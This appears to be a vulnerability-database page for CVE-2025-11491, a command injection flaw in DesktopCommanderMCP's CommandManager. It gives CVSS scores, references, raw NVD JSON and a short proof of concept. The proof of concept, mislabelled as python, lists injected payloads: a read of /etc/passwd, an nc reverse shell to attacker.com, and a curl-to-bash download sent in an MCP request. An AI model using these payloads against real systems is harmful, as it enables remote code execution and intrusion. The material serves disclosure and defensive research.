CVE-2025-11491

Description

A vulnerability was found in wonderwhy-er DesktopCommanderMCP up to 0.2.13. The impacted element is the function CommandManager of the file src/command-manager.ts. Performing manipulation results in os command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:wonderwhy-er:desktopcommandermcp:*:*:*:*:*:*:*:* - VULNERABLE

wonderwhy-er DesktopCommanderMCP < 0.2.13

wonderwhy-er DesktopCommanderMCP <= 0.2.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * CVE-2025-11491 - DesktopCommanderMCP OS Command Injection PoC
 * Target: wonderwhy-er DesktopCommanderMCP <= 0.2.13
 * Vulnerable component: CommandManager in src/command-manager.ts
 */

// Example of malicious command injection payload
// The CommandManager fails to sanitize shell metacharacters in user-supplied input

const maliciousPayload = "echo safe_output; cat /etc/passwd";
// OR using command substitution:
// const maliciousPayload = "echo $(whoami)";
// OR using backticks:
// const maliciousPayload = "echo `id`";
// OR using pipe:
// const maliciousPayload = "echo normal | nc attacker.com 4444 -e /bin/sh";

// Simulating the vulnerable CommandManager execution flow:
function vulnerableCommandManager(userCommand) {
    // The vulnerable code directly passes user input to child_process.exec or similar
    const { exec } = require('child_process');
    exec(userCommand, (error, stdout, stderr) => {
        if (error) {
            console.error(`Error: ${error.message}`);
            return;
        }
        console.log(stdout);
    });
}

// Trigger the vulnerability
vulnerableCommandManager(maliciousPayload);

// Remote exploitation via MCP protocol:
// An attacker with low-privilege access can send MCP requests containing
// injected shell commands through the CommandManager interface:
/*
POST /mcp HTTP/1.1
Host: target-host
Content-Type: application/json

{
    "method": "execute_command",
    "params": {
        "command": "ls; curl http://attacker.com/shell.sh | bash"
    }
}
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11491
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11491
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11491/
[4] VulDB https://vuldb.com/cve/CVE-2025-11491
[5] https://github.com/wonderwhy-er/DesktopCommanderMCP/issues/217
[6] https://github.com/wonderwhy-er/DesktopCommanderMCP/issues/217#issue-3343853704
[7] https://vuldb.com/?ctiid.327610
[8] https://vuldb.com/?id.327610
[9] https://vuldb.com/?submit.668006

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11491", "sourceIdentifier": "[email protected]", "published": "2025-10-08T19:15:44.137", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in wonderwhy-er DesktopCommanderMCP up to 0.2.13. The impacted element is the function CommandManager of the file src/command-manager.ts. Performing manipulation results in os command injection. It is possible to initiate the attack remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wonderwhy-er:desktopcommandermcp:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.2.13", "matchCriteriaId": "FBD1A083-2A30-46F7-9187-079AFEC42DB2"}]}]}], "references": [{"url": "https://github.com/wonderwhy-er/DesktopCommanderMCP/issues/217", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/wonderwhy-er/DesktopCommanderMCP/issues/217#issue-3343853704", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.327610", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327610", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.668006", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}